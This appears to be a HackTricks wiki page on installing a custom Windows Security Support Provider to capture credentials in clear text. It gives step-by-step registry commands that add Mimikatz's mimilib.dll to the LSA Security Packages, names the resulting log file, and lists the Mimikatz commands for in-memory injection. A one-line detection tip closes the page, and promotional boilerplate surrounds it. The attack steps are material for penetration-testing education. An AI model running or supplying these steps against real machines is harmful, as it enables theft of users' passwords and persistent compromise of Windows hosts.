hacktricks/windows-hardening/active-directory-methodology/custom-ssp.md
2022-05-01 13:25:53 +00:00

3.6 KiB

Support HackTricks and get benefits!

Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!

Discover The PEASS Family, our collection of exclusive NFTs

Get the official PEASS & HackTricks swag

Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦@carlospolopm.

Share your hacking tricks submitting PRs to the hacktricks github repo.

Custom SSP

Learn what is a SSP (Security Support Provider) here.
You can create you own SSP to capture in clear text the credentials used to access the machine.

Mimilib

You can use the mimilib.dll binary provided by Mimikatz. This will log inside a file all the credentials in clear text.
Drop the dll in C:\Windows\System32\
Get a list existing LSA Security Packages:

{% code title="attacker@target" %}

PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"

HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
    Security Packages    REG_MULTI_SZ    kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u

{% endcode %}

Add mimilib.dll to the Security Support Provider list (Security Packages):

PS C:\> reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"

And after a reboot all credentials can be found in clear text in C:\Windows\System32\kiwissp.log

In memory

You can also inject this in memory directly using Mimikatz (notice that it could be a little bit unstable/not working):

privilege::debug
misc::memssp

This won't survive reboots.

Mitigation

Event ID 4657 - Audit creation/change of HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages

Support HackTricks and get benefits!

Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!

Discover The PEASS Family, our collection of exclusive NFTs

Get the official PEASS & HackTricks swag

Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦@carlospolopm.

Share your hacking tricks submitting PRs to the hacktricks github repo.